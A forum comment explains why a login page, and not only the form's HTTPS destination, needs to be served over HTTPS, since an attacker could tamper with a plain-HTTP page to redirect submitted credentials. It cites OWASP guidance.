No, no, no! I'm afraid that THIS comment reflects a widely-held, but completely wrong (or WRONG ) misconception. In order to properly protect submitted data, not only does the destination URL have to be encrypted (ie use HTTPS), but the original page the data is entered onto needs to be as well.

The reason for this is that if a login page (the main BA page for example) is served over plain HTTP and not encrypted then it is "relatively"* straightforward for an evil-doer to change the login / main page. They could alter the destination that the login form sends the data to, thus bypassing or nullifying the correct "HTTPS" URL, or inject other malicious content. Unless you check the main page source each time you load it then you cannot be sure that the destination for your login data hasn't been modified to send it somewhere else. Even if you do check the page source your data could still be hijacked using various techniques involving Javascript.

For further details and very useful guidelines see the OWASP cheat sheet: https://www.owasp.org/index.php/Tran...nticated_Pages

In short, for proper protection of HTML form submitted data both the page with the form AND the form handler / destination URL should be protected by being served over HTTPS.

* The relative simplicity of doing this depends on several factors and may vary from being very simply to quite difficult. But it definitely is possible.